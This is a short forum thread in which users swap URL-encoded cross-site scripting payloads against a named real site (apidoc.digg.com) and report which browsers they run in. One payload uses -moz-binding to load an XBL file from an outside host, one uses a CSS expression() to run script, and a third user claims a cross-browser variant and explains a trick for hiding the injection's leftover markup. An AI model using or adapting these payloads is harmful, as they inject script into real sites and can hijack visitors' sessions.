ma1 Wrote:
-------------------------------------------------------
> Ghozt Wrote:
> --------------------------------------------------
> -----
> >
> [
apidoc.digg.com]
>
> >
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
>
> > 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
> Couldn't make it work on Firefox (where it
> belongs), not sure why, but this variant did work
> with IE:
>
> [
apidoc.digg.com]%
> 20style%3D%22color:%20expression%28document.title%
> 3D%27xss%27%29
Not sure what you were trying to do, but this works in IE, FF and Opera:
[
apidoc.digg.com]
Added a dead input tag to hide the maxlength attribute on the search box that gets orphaned on the injection.